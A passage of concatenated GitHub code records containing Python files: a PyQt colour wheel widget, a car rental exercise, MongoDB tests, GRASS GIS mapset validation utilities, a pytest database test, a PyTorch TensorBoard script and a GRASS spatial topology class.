QtGui.QHBoxLayout()\n self.wheel = WheelWidget()\n self.slider = SliderWidget()\n self.box.addWidget(self.slider, 1)\n self.box.addWidget(self.wheel, 5)\n self.setLayout(self.box)\n self.wheel.clicked.connect(self._on_click_wheel)\n self.wheel.edited.connect(self._on_wheel_edited)\n self.slider.clicked.connect(self._on_click_slider)\n self.harmonies_selector = None\n self._prev_color = hcy(0,0,0)\n self._sequence = 0\n\n def mouseReleaseEvent(self, event):\n self._sequence += 1\n\n def _on_wheel_edited(self):\n self.edited.emit()\n\n def get_enable_editing(self):\n return self.wheel.enable_editing\n \n def set_enable_editing(self, value):\n self.wheel.enable_editing = value\n #print(\"Enable editing: {}\".format(value))\n if value and self.wheel._harmonized is None:\n self.wheel._harmonized = [(0,0.9), (0, 0.3), (0.5, 0.3), (0.5, 0.9)]\n\n enable_editing = property(get_enable_editing, set_enable_editing)\n\n def _on_click_wheel(self, mouse_pressed, hue, chroma):\n self.slider.cache.hue = hue\n 
self.slider.cache.redraw(self.slider.width(), self.slider.height())\n self.update()\n color = hcy(hue, chroma, self.slider.luma)\n self.selected.emit(self._sequence, self._prev_color, color)\n self._prev_color = color\n\n def _on_click_slider(self, mouse_pressed, luma):\n self.wheel.set_luma(luma)\n self.update()\n color = hcy(self.wheel.hue, self.wheel.chroma, luma)\n self.selected.emit(self._sequence, self._prev_color, color)\n self._prev_color = color\n\n def setColor(self, color, no_signal=False):\n if color is None:\n return\n h,c,y = color.getHCY()\n self.slider.cache.hue = h\n self.slider.cache.redraw(self.slider.width(), self.slider.height())\n self.slider.select(y)\n self.wheel.set_luma(y)\n self.wheel.select(h,c)\n self.update()\n if not no_signal:\n self.selected.emit(self._sequence, self._prev_color, color)\n self._prev_color = color\n\n def getColor(self):\n return self.wheel.get_color()\n\n def set_harmonized(self, list):\n pass\n #self.wheel._harmonized = list\n #self.repaint()\n\n def setHarmony(self, harmony, idx=None):\n self.set_harmony(harmony)\n if self.harmonies_selector is not None and idx is not None:\n self.harmonies_selector.select_item(idx)\n\n def set_harmony(self, harmony):\n current = self.getColor()\n if current is None:\n return\n self.wheel.set_harmony(harmony, current)\n\n def set_harmony_parameter(self, value):\n self.wheel.set_harmony_parameter(value, self.getColor())\n\n def get_harmonized(self):\n if self.wheel._harmonized is None:\n return None\n return [hcy(hue, chroma, self.slider.luma) for hue, chroma in self.wheel._harmonized]\n\n\n\n","repo_name":"portnov/color-palette","sub_path":"palette-editor/widgets/wheel.py","file_name":"wheel.py","file_ext":"py","file_size_in_byte":14311,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"19"} +{"seq_id":"73889886764","text":"class RentCar:\r\n def __init__(self):\r\n self.car_list = {'Hatchback':30,'Sedan':50,'SUV':100}\r\n\r\n def display_details(self):\r\n print(\"Cost per day: \")\r\n print(\"Hatchback $\",self.car_list['Hatchback'])\r\n print('Sedan $',self.car_list['Sedan'])\r\n print('SUV $',self.car_list['SUV'])\r\n \r\n def calculate_price(self,name_car,days):\r\n if name_car in self.car_list:\r\n return days * self.car_list[name_car]\r\n if days>0:\r\n print('Error. 
Sorry, this car is not in our list')\r\n        else:\r\n            print('Error. days needs to be more than 0')\r\n        \r\nclass Customer:\r\n    def rent_car(self, rental, car):\r\n        # remove the rented car from the rental company's list\r\n        if car in rental.car_list:\r\n            del rental.car_list[car]\r\n            print('Rent with success')\r\n        else:\r\n            print('Sorry, this car is not in our list')\r\n    \r\n    \r\ncar = RentCar()\r\ncustomer = Customer()\r\ncar.display_details()\r\n\r\nwhile True:\r\n    print('''\r\n    Enter 1 to display the list of available cars\r\n    Enter 2 to rent a car\r\n    Enter 3 to quit\r\n    ''')\r\n    user_choice = int(input())\r\n    if user_choice == 1:\r\n        car.display_details()\r\n\r\n    elif user_choice == 2:\r\n        car_name = input('Enter the name of the car you want: ')\r\n        days = int(input('Enter the number of days you would like to borrow the car: '))\r\n        if days <= 0:\r\n            print('Error. days needs to be more than 0')\r\n            continue\r\n        total_price = car.calculate_price(car_name, days)\r\n        if total_price is not None:\r\n            print('The price will be: {}'.format(total_price))\r\n    elif user_choice == 3:\r\n        break","repo_name":"getmenova/pyPalace","sub_path":"Abstraction&Encapsulation/carrental2.py","file_name":"carrental2.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"33829316614","text":"# -*- coding: utf-8 -*- \n'''\nCreated on 2018-09-29\n\n@author: Administrator\n'''\nfrom pymongo import MongoClient\nfrom pprint import pprint\nfrom bson.objectid import ObjectId\nimport re\nimport time\nimport datetime\n\ndef test_tk():\n    mongo_host='local.vm.sss.com'\n    mongo_port=27017\n    \n    client = MongoClient(mongo_host, mongo_port)\n    \n    db_platform_tk = client['platform-tk']\n    ygbase_data_c = db_platform_tk['ygbaseData']\n    \n    data=ygbase_data_c.find_one()\n    pprint(data)\n    \n    print(ObjectId())\n    print('*'*100)\n    print(ygbase_data_c.find({\"error\" : False, '_id': re.compile('^BFEGZSX060')}).count())\n    # print(ygbase_data_c.find({\"error\" : False, '_id': {'$regex' : '^BFEGZSX060'}}).count())\n    \n    max_time=None\n    min_time=None\n    cnt=0\n    for index, data in enumerate(ygbase_data_c.find({'_id': re.compile('^BFEGZSX060')})):\n        tmp = data['date']\n        max_time = tmp if max_time is None or max_time < tmp else max_time\n        min_time = tmp if min_time is None or min_time > tmp else min_time\n        cnt = index + 1\n    print(max_time)\n    print(min_time)\n    print(cnt)\n    # total_seconds() avoids truncating spans longer than one day\n    print((max_time - min_time).total_seconds() / cnt)\n\ndef test_time():\n    mongo_host='local.vm.sss.com'\n    mongo_port=27017\n    \n    client = MongoClient(mongo_host, mongo_port)\n    \n    database = client['fwgame']\n    coll = database['timetest']\n#     coll.insert(dict(_id=ObjectId().__str__(), time = datetime.datetime.now()))\n#     data = coll.find_one()\n    print(datetime.datetime.now())\n    print(datetime.datetime.utcnow().timetuple())\n    print(int(time.mktime(datetime.datetime.utcnow().timetuple()) * 1000))\n\ntest_time()\nprint('ok')","repo_name":"badboyf/fzk_python","sub_path":"fzk-py/src/mongo_t.py","file_name":"mongo_t.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"38173451337","text":"\"\"\"\nChecking objects in a GRASS GIS Spatial Database\n\n(C) 2020 by the GRASS Development Team\nThis program is free software under the GNU General Public\nLicense (>=v2). Read the file COPYING that comes with GRASS\nfor details.\n\n.. 
sectionauthor:: Vaclav Petras \n\"\"\"\n\nimport datetime\nimport glob\nimport os\nimport sys\nfrom pathlib import Path\n\nimport grass.grassdb.config as cfg\nimport grass.script as gs\nfrom grass.script import gisenv\n\n\ndef mapset_exists(path, location=None, mapset=None):\n    \"\"\"Returns True if the mapset path exists.\n\n    Either only *path* is provided or all three parameters need to be provided.\n\n    :param path: Path to a Mapset or to a GRASS GIS database directory\n    :param location: name of a Location if not part of *path*\n    :param mapset: name of a Mapset if not part of *path*\n    \"\"\"\n    if location and mapset:\n        path = os.path.join(path, location, mapset)\n    elif location or mapset:\n        raise ValueError(_(\"Provide only path or all three parameters, not two\"))\n    return os.path.exists(path)\n\n\ndef location_exists(path, location=None):\n    \"\"\"Returns True if the location path exists.\n\n    :param path: Path to a Location or to a GRASS GIS database directory\n    :param location: name of a Location if not part of *path*\n    \"\"\"\n    if location:\n        path = os.path.join(path, location)\n    return os.path.exists(path)\n\n\n# TODO: distinguish between valid for getting maps and usable as current\n# https://lists.osgeo.org/pipermail/grass-dev/2016-September/082317.html\n# interface created according to the current usage\ndef is_mapset_valid(path, location=None, mapset=None):\n    \"\"\"Return True if GRASS Mapset is valid\n\n    Either only *path* is provided or all three parameters need to be provided.\n\n    :param path: Path to a Mapset or to a GRASS GIS database directory\n    :param location: name of a Location if not part of *path*\n    :param mapset: name of a Mapset if not part of *path*\n    \"\"\"\n    # WIND is created from DEFAULT_WIND by `g.region -d` and functions\n    # or modules which create a new mapset. Most modules will fail if\n    # WIND doesn't exist (assuming that neither GRASS_REGION nor\n    # WIND_OVERRIDE environmental variables are set).\n    if location and mapset:\n        path = os.path.join(path, location, mapset)\n    elif location or mapset:\n        raise ValueError(_(\"Provide only path or all three parameters, not two\"))\n    return os.access(os.path.join(path, \"WIND\"), os.R_OK)\n\n\ndef is_location_valid(path, location=None):\n    \"\"\"Return True if GRASS Location is valid\n\n    :param path: Path to a Location or to a GRASS GIS database directory\n    :param location: name of a Location if not part of *path*\n    \"\"\"\n    # DEFAULT_WIND file should not be required until you do something\n    # that actually uses them. 
The check is just a heuristic; a directory\n # containing a PERMANENT/DEFAULT_WIND file is probably a GRASS\n # location, while a directory lacking it probably isn't.\n if location:\n path = os.path.join(path, location)\n return os.access(os.path.join(path, \"PERMANENT\", \"DEFAULT_WIND\"), os.F_OK)\n\n\ndef is_mapset_current(database, location, mapset):\n \"\"\"Return True if the given GRASS Mapset is the current mapset\"\"\"\n genv = gisenv()\n if (\n database == genv[\"GISDBASE\"]\n and location == genv[\"LOCATION_NAME\"]\n and mapset == genv[\"MAPSET\"]\n ):\n return True\n return False\n\n\ndef is_location_current(database, location):\n \"\"\"Return True if the given GRASS Location is the current location\"\"\"\n genv = gisenv()\n if database == genv[\"GISDBASE\"] and location == genv[\"LOCATION_NAME\"]:\n return True\n return False\n\n\ndef is_current_user_mapset_owner(mapset_path):\n \"\"\"Returns True if mapset owner is the current user.\n On Windows it always returns True.\"\"\"\n # Note that this does account for libgis built with SKIP_MAPSET_OWN_CHK\n # which disables the ownerships check, i.e., even if it was build with the\n # skip, it still needs the env variable.\n if os.environ.get(\"GRASS_SKIP_MAPSET_OWNER_CHECK\", None):\n # Mapset just needs to be accessible for writing.\n return os.access(mapset_path, os.W_OK)\n # Mapset needs to be owned by user.\n if sys.platform == \"win32\":\n return True\n stat_info = os.stat(mapset_path)\n mapset_uid = stat_info.st_uid\n return mapset_uid == os.getuid()\n\n\ndef is_different_mapset_owner(mapset_path):\n \"\"\"Returns True if mapset owner is different from the current user\"\"\"\n return not is_current_user_mapset_owner(mapset_path)\n\n\ndef get_mapset_owner(mapset_path):\n \"\"\"Returns mapset owner name or None if owner name unknown.\n On Windows it always returns None.\"\"\"\n if sys.platform == \"win32\":\n return None\n try:\n path = Path(mapset_path)\n return path.owner()\n except KeyError:\n return None\n\n\ndef is_fallback_session():\n \"\"\"Checks if a user encounters a fallback GRASS session.\n\n Returns True if a user encounters a fallback session.\n It occurs when a last mapset is not usable and at the same time\n a user is in a temporary location.\n \"\"\"\n if \"LAST_MAPSET_PATH\" in gisenv().keys():\n return is_mapset_current(\n os.environ[\"TMPDIR\"], cfg.temporary_location, cfg.permanent_mapset\n )\n return False\n\n\ndef is_first_time_user():\n \"\"\"Check if a user is a first-time user.\n\n Returns True if a user is a first-time user.\n It occurs when a gisrc file has initial settings either in last used mapset\n or in current mapset settings.\n \"\"\"\n genv = gisenv()\n if \"LAST_MAPSET_PATH\" in genv.keys():\n return genv[\"LAST_MAPSET_PATH\"] == os.path.join(\n os.getcwd(), cfg.unknown_location, cfg.unknown_mapset\n )\n return False\n\n\ndef is_mapset_locked(mapset_path):\n \"\"\"Check if the mapset is locked\"\"\"\n lock_name = \".gislock\"\n lockfile = os.path.join(mapset_path, lock_name)\n return os.path.exists(lockfile)\n\n\ndef get_lockfile_if_present(database, location, mapset):\n \"\"\"Return path to lock if present, None otherwise\n\n Returns the path as a string or None if nothing was found, so the\n return value can be used to test if the lock is present.\n \"\"\"\n lock_name = \".gislock\"\n lockfile = os.path.join(database, location, mapset, lock_name)\n if os.path.isfile(lockfile):\n return lockfile\n return None\n\n\ndef get_mapset_lock_info(mapset_path):\n \"\"\"Get information about .gislock 
file.\n Assumes lock file exists, use is_mapset_locked to find out.\n Returns information as a dictionary with keys\n 'owner' (None if unknown), 'lockpath', and 'timestamp'.\n \"\"\"\n info = {}\n lock_name = \".gislock\"\n info[\"lockpath\"] = os.path.join(mapset_path, lock_name)\n try:\n info[\"owner\"] = Path(info[\"lockpath\"]).owner()\n except KeyError:\n info[\"owner\"] = None\n info[\"timestamp\"] = (\n datetime.datetime.fromtimestamp(os.path.getmtime(info[\"lockpath\"]))\n ).replace(microsecond=0)\n return info\n\n\ndef can_start_in_mapset(mapset_path, ignore_lock=False):\n \"\"\"Check if a mapset from a gisrc file is usable for new session\"\"\"\n if not is_mapset_valid(mapset_path):\n return False\n if not is_current_user_mapset_owner(mapset_path):\n return False\n if not ignore_lock and is_mapset_locked(mapset_path):\n return False\n return True\n\n\ndef get_reason_id_mapset_not_usable(mapset_path):\n \"\"\"It finds a reason why mapset is not usable.\n\n Returns a reason id as a string.\n If mapset path is None or no reason found, returns None.\n \"\"\"\n # Check whether mapset exists\n if not os.path.exists(mapset_path):\n return \"non-existent\"\n # Check whether mapset is valid\n elif not is_mapset_valid(mapset_path):\n return \"invalid\"\n # Check whether mapset is owned by current user\n elif not is_current_user_mapset_owner(mapset_path):\n return \"different-owner\"\n # Check whether mapset is locked\n elif is_mapset_locked(mapset_path):\n return \"locked\"\n return None\n\n\ndef dir_contains_location(path):\n \"\"\"Return True if directory *path* contains a valid location\"\"\"\n if not os.path.isdir(path):\n return False\n for name in os.listdir(path):\n if os.path.isdir(os.path.join(path, name)):\n if is_location_valid(path, name):\n return True\n return False\n\n\n# basically checking location, possibly split into two functions\n# (mapset one can call location one)\ndef get_mapset_invalid_reason(database, location, mapset, none_for_no_reason=False):\n \"\"\"Returns a message describing what is wrong with the Mapset\n\n The goal is to provide the most suitable error message\n (rather than to do a quick check).\n\n :param database: Path to GRASS GIS database directory\n :param location: name of a Location\n :param mapset: name of a Mapset\n :returns: translated message\n \"\"\"\n # Since we are trying to get the one most likely message, we need all\n # those return statements here.\n # pylint: disable=too-many-return-statements\n location_path = os.path.join(database, location)\n mapset_path = os.path.join(location_path, mapset)\n # first checking the location validity\n # perhaps a special set of checks with different messages mentioning mapset\n # will be needed instead of the same set of messages used for location\n location_msg = get_location_invalid_reason(\n database, location, none_for_no_reason=True\n )\n if location_msg:\n return location_msg\n # if location is valid, check mapset\n if mapset not in os.listdir(location_path):\n # TODO: remove the grass.py specific wording\n return _(\n \"Mapset <{mapset}> doesn't exist in GRASS Location <{location}>\"\n ).format(mapset=mapset, location=location)\n if not os.path.isdir(mapset_path):\n return _(\"<%s> is not a GRASS Mapset because it is not a directory\") % mapset\n if not os.path.isfile(os.path.join(mapset_path, \"WIND\")):\n return (\n _(\n \"<%s> is not a valid GRASS Mapset\"\n \" because it does not have a WIND file\"\n )\n % mapset\n )\n # based on the is_mapset_valid() function\n if not 
os.access(os.path.join(mapset_path, \"WIND\"), os.R_OK):\n return (\n _(\n \"<%s> is not a valid GRASS Mapset\"\n \" because its WIND file is not readable\"\n )\n % mapset\n )\n # no reason for invalidity found (might be valid)\n if none_for_no_reason:\n return None\n return _(\n \"Mapset <{mapset}> or Location <{location}> is invalid for an unknown reason\"\n ).format(mapset=mapset, location=location)\n\n\ndef get_location_invalid_reason(database, location, none_for_no_reason=False):\n \"\"\"Returns a message describing what is wrong with the Location\n\n The goal is to provide the most suitable error message\n (rather than to do a quick check).\n\n By default, when no reason is found, a message about unknown reason is\n returned. This applies also to the case when this function is called on\n a valid location (e.g. as a part of larger investigation).\n ``none_for_no_reason=True`` allows the function to be used as part of other\n diagnostic. When this function fails to find reason for invalidity, other\n the caller can continue the investigation in their context.\n\n :param database: Path to GRASS GIS database directory\n :param location: name of a Location\n :param none_for_no_reason: When True, return None when reason is unknown\n :returns: translated message or None\n \"\"\"\n location_path = os.path.join(database, location)\n permanent_path = os.path.join(location_path, \"PERMANENT\")\n\n # directory\n if not os.path.exists(location_path):\n return _(\"Location <%s> doesn't exist\") % location_path\n # permanent mapset\n if \"PERMANENT\" not in os.listdir(location_path):\n return (\n _(\n \"<%s> is not a valid GRASS Location\"\n \" because PERMANENT Mapset is missing\"\n )\n % location_path\n )\n if not os.path.isdir(permanent_path):\n return (\n _(\n \"<%s> is not a valid GRASS Location\"\n \" because PERMANENT is not a directory\"\n )\n % location_path\n )\n # partially based on the is_location_valid() function\n if not os.path.isfile(os.path.join(permanent_path, \"DEFAULT_WIND\")):\n return (\n _(\n \"<%s> is not a valid GRASS Location\"\n \" because PERMANENT Mapset does not have a DEFAULT_WIND file\"\n \" (default computational region)\"\n )\n % location_path\n )\n # no reason for invalidity found (might be valid)\n if none_for_no_reason:\n return None\n return _(\"Location <{location_path}> is invalid for an unknown reason\").format(\n location_path=location_path\n )\n\n\ndef get_location_invalid_suggestion(database, location):\n \"\"\"Return suggestion what to do when specified location is not valid\n\n It gives suggestion when:\n * A mapset was specified instead of a location.\n * A GRASS database was specified instead of a location.\n \"\"\"\n location_path = os.path.join(database, location)\n # a common error is to use mapset instead of location,\n # if that's the case, include that info into the message\n if is_mapset_valid(location_path):\n return _(\n \"<{location}> looks like a mapset, not a location.\"\n \" Did you mean just <{one_dir_up}>?\"\n ).format(location=location, one_dir_up=database)\n # confusion about what is database and what is location\n if dir_contains_location(location_path):\n return _(\n \"It looks like <{location}> contains locations.\"\n \" Did you mean to specify one of them?\"\n ).format(location=location)\n return None\n\n\ndef get_mapset_name_invalid_reason(database, location, mapset_name):\n \"\"\"Get reasons why mapset name is not valid.\n\n It gets reasons when:\n * Name is not valid.\n * Name is reserved for OGR layers.\n * Mapset in the same 
path already exists.\n\n    Returns message as string if there was a reason, otherwise None.\n    \"\"\"\n    message = None\n    mapset_path = os.path.join(database, location, mapset_name)\n\n    # Check if mapset name is valid\n    if not gs.legal_name(mapset_name):\n        message = _(\n            \"Name '{}' is not a valid name for location or mapset. \"\n            \"Please use only ASCII characters excluding characters {} \"\n            \"and space.\"\n        ).format(mapset_name, \"/\\\"'@,=*~\")\n    # Check reserved mapset name\n    elif mapset_name.lower() == \"ogr\":\n        message = _(\n            \"Name '{}' is reserved for direct \"\n            \"read access to OGR layers. Please use \"\n            \"another name for your mapset.\"\n        ).format(mapset_name)\n    # Check whether mapset exists\n    elif mapset_exists(database, location, mapset_name):\n        message = _(\n            \"Mapset <{mapset}> already exists. Please consider using \"\n            \"another name for your mapset.\"\n        ).format(mapset=mapset_path)\n\n    return message\n\n\ndef get_location_name_invalid_reason(grassdb, location_name):\n    \"\"\"Get reasons why location name is not valid.\n\n    It gets reasons when:\n    * Name is not valid.\n    * Location in the same path already exists.\n\n    Returns message as string if there was a reason, otherwise None.\n    \"\"\"\n    message = None\n    location_path = os.path.join(grassdb, location_name)\n\n    # Check if location name is valid\n    if not gs.legal_name(location_name):\n        message = _(\n            \"Name '{}' is not a valid name for location or mapset. \"\n            \"Please use only ASCII characters excluding characters {} \"\n            \"and space.\"\n        ).format(location_name, \"/\\\"'@,=*~\")\n    # Check whether location exists\n    elif location_exists(grassdb, location_name):\n        message = _(\n            \"Location <{location}> already exists. Please consider using \"\n            \"another name for your location.\"\n        ).format(location=location_path)\n\n    return message\n\n\ndef is_mapset_name_valid(database, location, mapset_name):\n    \"\"\"Check if mapset name is valid.\n\n    Returns True if mapset name is valid, otherwise False.\n    \"\"\"\n    return (\n        gs.legal_name(mapset_name)\n        and mapset_name.lower() != \"ogr\"\n        and not mapset_exists(database, location, mapset_name)\n    )\n\n\ndef is_location_name_valid(database, location_name):\n    \"\"\"Check if location name is valid.\n\n    Returns True if location name is valid, otherwise False.\n    \"\"\"\n    return gs.legal_name(location_name) and not location_exists(database, location_name)\n\n\ndef get_reasons_mapsets_not_removable(mapsets, check_permanent):\n    \"\"\"Get reasons why mapsets cannot be removed.\n\n    Parameter *mapsets* is a list of tuples (database, location, mapset).\n    Parameter *check_permanent* is True or False. It depends on whether\n    we want to check for permanent mapset or not.\n\n    Returns messages as list if there were any failed checks, otherwise empty list.\n    \"\"\"\n    messages = []\n    for grassdb, location, mapset in mapsets:\n        message = get_reason_mapset_not_removable(\n            grassdb, location, mapset, check_permanent\n        )\n        if message:\n            messages.append(message)\n    return messages\n\n\ndef get_reason_mapset_not_removable(grassdb, location, mapset, check_permanent):\n    \"\"\"Get reason why one mapset cannot be removed.\n\n    Parameter *check_permanent* is True or False. 
It depends on whether\n    we want to check for permanent mapset or not.\n\n    Returns message as string if there was a failed check, otherwise None.\n    \"\"\"\n    message = None\n    mapset_path = os.path.join(grassdb, location, mapset)\n\n    # Check if mapset is permanent\n    if check_permanent and mapset == \"PERMANENT\":\n        message = _(\"Mapset <{mapset}> is required for a valid location.\").format(\n            mapset=mapset_path\n        )\n    # Check if mapset is current\n    elif is_mapset_current(grassdb, location, mapset):\n        message = _(\"Mapset <{mapset}> is the current mapset.\").format(\n            mapset=mapset_path\n        )\n    # Check whether mapset is in use\n    elif is_mapset_locked(mapset_path):\n        message = _(\"Mapset <{mapset}> is in use.\").format(mapset=mapset_path)\n    # Check whether mapset is owned by different user\n    elif is_different_mapset_owner(mapset_path):\n        message = _(\"Mapset <{mapset}> is owned by a different user.\").format(\n            mapset=mapset_path\n        )\n\n    return message\n\n\ndef get_reasons_locations_not_removable(locations):\n    \"\"\"Get reasons why locations cannot be removed.\n\n    Parameter *locations* is a list of tuples (database, location).\n\n    Returns messages as list if there were any failed checks, otherwise empty list.\n    \"\"\"\n    messages = []\n    for grassdb, location in locations:\n        messages += get_reasons_location_not_removable(grassdb, location)\n    return messages\n\n\ndef get_reasons_location_not_removable(grassdb, location):\n    \"\"\"Get reasons why one location cannot be removed.\n\n    Returns messages as list if there were any failed checks, otherwise empty list.\n    \"\"\"\n    messages = []\n    location_path = os.path.join(grassdb, location)\n\n    # Check if location is current\n    if is_location_current(grassdb, location):\n        messages.append(\n            _(\"Location <{location}> is the current location.\").format(\n                location=location_path\n            )\n        )\n        return messages\n\n    # Find mapsets in particular location\n    tmp_gisrc_file, env = gs.create_environment(grassdb, location, \"PERMANENT\")\n    env[\"GRASS_SKIP_MAPSET_OWNER_CHECK\"] = \"1\"\n\n    g_mapsets = (\n        gs.read_command(\"g.mapsets\", flags=\"l\", separator=\"comma\", quiet=True, env=env)\n        .strip()\n        .split(\",\")\n    )\n\n    # Append to the list of tuples\n    mapsets = []\n    for g_mapset in g_mapsets:\n        mapsets.append((grassdb, location, g_mapset))\n\n    # Concatenate both checks\n    messages += get_reasons_mapsets_not_removable(mapsets, check_permanent=False)\n\n    gs.try_remove(tmp_gisrc_file)\n    return messages\n\n\ndef get_reasons_grassdb_not_removable(grassdb):\n    \"\"\"Get reasons why one grassdb cannot be removed.\n\n    Returns messages as list if there were any failed checks, otherwise empty list.\n    \"\"\"\n    messages = []\n    genv = gisenv()\n\n    # Check if grassdb is current\n    if grassdb == genv[\"GISDBASE\"]:\n        messages.append(\n            _(\"GRASS database <{grassdb}> is the current database.\").format(\n                grassdb=grassdb\n            )\n        )\n        return messages\n\n    g_locations = get_list_of_locations(grassdb)\n\n    # Append to the list of tuples\n    locations = []\n    for g_location in g_locations:\n        locations.append((grassdb, g_location))\n    messages = get_reasons_locations_not_removable(locations)\n\n    return messages\n\n\ndef get_list_of_locations(dbase):\n    \"\"\"Get list of GRASS locations in given dbase\n\n    :param dbase: GRASS database path\n\n    :return: list of locations (sorted)\n    \"\"\"\n    locations = list()\n    for location in glob.glob(os.path.join(dbase, \"*\")):\n        if os.path.join(location, \"PERMANENT\") in glob.glob(\n            os.path.join(location, \"*\")\n        ):\n            locations.append(os.path.basename(location))\n\n    
locations.sort(key=lambda x: x.lower())\n\n return locations\n","repo_name":"OSGeo/grass","sub_path":"python/grass/grassdb/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":21580,"program_lang":"python","lang":"en","doc_type":"code","stars":687,"dataset":"github-code","pt":"19"} +{"seq_id":"70812961644","text":"import sqlite3\n\nimport pytest\nfrom ..flask_pet_project.dbase import get_db\n\n\ndef test_get_close_dbase(app):\n with app.app_context():\n # Checking if the data bases return the same connection each time\n db = get_db()\n assert db is get_db()\n\n # Call correspond error during sql-request (u can't connect to db because it was closed earlier)\n with pytest.raises(sqlite3.ProgrammingError) as e:\n db.execute('SELECT 1')\n # Get access to the information about raised error\n assert 'closed' in str(e.value)\n\n","repo_name":"galinapivovarnik/Flask_small_project","sub_path":"Test_for_app/test_dbase.py","file_name":"test_dbase.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28348812763","text":"# imports\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nimport torch\nimport torchvision\nimport torchvision.transforms as transforms\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom custom_dataset import MyDataset\nfrom custom_autoencoder import AutoEncoder\n\nnum_epochs = 100\nbatch_size = 12\nlearning_rate = 1e-3\nlatent_size = 64\nPATH = \"facade_ae.pth\"\n\ndata_transforms = {\n 'train': transforms.Compose([\n transforms.ToTensor()\n ]),\n 'test': transforms.Compose([\n transforms.ToTensor()\n ])\n}\n\ndata_dir = 'data_ae'\nimage_datasets = {x: MyDataset(x + '.csv', os.path.join(data_dir, x), data_transforms[x]) for x in ['train']}\ndataset_loaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle=True, num_workers=8)\n for x in ['train']}\ndataset_sizes = {x: len(image_datasets[x]) for x in ['train']}\nprint(dataset_sizes)\n\n# GPU mode\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nmodel = AutoEncoder(in_channels=1, dec_channels=16, latent_size=latent_size)\ncriterion = nn.MSELoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\nfrom torch.utils.tensorboard import SummaryWriter\n\n# default `log_dir` is \"runs\" - we'll be more specific here\nwriter = SummaryWriter('runs/facade_experiment')\n\n# get some random training images\ndataiter = iter(dataset_loaders['train'])\nsample = dataiter.next()\nimg_1 = sample['input_1']\nimg_2 = sample['input_2']\nimages_gt = sample['input_gt']\n\nwriter.add_graph(model, (img_1, img_2))\nwriter.close()","repo_name":"xwzhangcs/facades_fuse","sub_path":"custom_tensorb.py","file_name":"custom_tensorb.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38174040447","text":"\"\"\"\nSpatial topology connector class\n\nUsage:\n\n>>> import grass.temporal as tgis\n>>> tmr = tgis.SpatialTopologyDatasetConnector()\n\n(C) 2012-2013 by the GRASS Development Team\nThis program is free software under the GNU General Public\nLicense (>=v2). 
Read the file COPYING that comes with GRASS\nfor details.\n\n:authors: Soeren Gebbert\n\"\"\"\nimport copy\n\n\nclass SpatialTopologyDatasetConnector(object):\n \"\"\"This class implements a spatial topology access structure to connect\n spatial related datasets\n\n This object will be set up by spatial topology creation method provided\n by the SpatioTemporalTopologyBuilder.\n\n The following spatial relations with access methods are supported:\n\n - equivalent\n - overlap\n - in\n - contain\n - meet\n - cover\n - covered\n\n Usage:\n\n .. code-block:: python\n\n >>> import grass.temporal as tgis\n >>> tgis.init()\n >>> map = tgis.RasterDataset(\"a@P\")\n >>> tmr = tgis.SpatialTopologyDatasetConnector()\n >>> tmr.append_equivalent(map)\n >>> tmr.append_overlap(map)\n >>> tmr.append_in(map)\n >>> tmr.append_contain(map)\n >>> tmr.append_meet(map)\n >>> tmr.append_cover(map)\n >>> tmr.append_covered(map)\n >>> tmr.print_spatial_topology_info()\n +-------------------- Spatial Topology --------------------------------------+\n | Equivalent: ................ a@P\n | Cover: ..................... a@P\n | Covered: ................... a@P\n | Overlap: ................... a@P\n | In: ........................ a@P\n | Contain: ................... a@P\n | Meet: ...................... a@P\n >>> tmr.print_spatial_topology_shell_info()\n equivalent=a@P\n cover=a@P\n covered=a@P\n overlap=a@P\n in=a@P\n contain=a@P\n meet=a@P\n >>> rlist = tmr.get_spatial_relations()\n >>> if \"COVER\" in rlist.keys():\n ... print(rlist[\"COVER\"][0].get_id())\n a@P\n\n \"\"\"\n\n def __init__(self):\n self.reset_spatial_topology()\n\n def reset_spatial_topology(self):\n \"\"\"Reset any information about temporal topology\"\"\"\n self._spatial_topology = {}\n self._has_spatial_topology = False\n\n def get_spatial_relations(self):\n \"\"\"Return the dictionary of spatial relationships\n\n Keys are the spatial relationships in upper case,\n values are abstract map objects.\n\n :return: The spatial relations dictionary\n \"\"\"\n return copy.copy(self._spatial_topology)\n\n def get_number_of_spatial_relations(self):\n \"\"\"Return a dictionary in which the keys are the relation names and the value\n are the number of relations.\n\n The following relations are available:\n\n - equivalent\n - overlap\n - in\n - contain\n - meet\n - cover\n - covered\n\n To access topological information the spatial topology must be\n build first using the SpatialTopologyBuilder.\n\n :return: the dictionary with relations as keys and number as\n values or None in case the topology wasn't build\n \"\"\"\n if self._has_spatial_topology is False:\n return None\n\n relations = {}\n try:\n relations[\"equivalent\"] = len(self._spatial_topology[\"EQUIVALENT\"])\n except:\n relations[\"equivalent\"] = 0\n try:\n relations[\"overlap\"] = len(self._spatial_topology[\"OVERLAP\"])\n except:\n relations[\"overlap\"] = 0\n try:\n relations[\"in\"] = len(self._spatial_topology[\"IN\"])\n except:\n relations[\"in\"] = 0\n try:\n relations[\"contain\"] = len(self._spatial_topology[\"CONTAIN\"])\n except:\n relations[\"contain\"] = 0\n try:\n relations[\"meet\"] = len(self._spatial_topology[\"MEET\"])\n except:\n relations[\"meet\"] = 0\n try:\n relations[\"cover\"] = len(self._spatial_topology[\"COVER\"])\n except:\n relations[\"cover\"] = 0\n try:\n relations[\"covered\"] = len(self._spatial_topology[\"COVERED\"])\n except:\n relations[\"covered\"] = 0\n\n return relations\n\n def set_spatial_topology_build_true(self):\n \"\"\"Same as name\"\"\"\n 
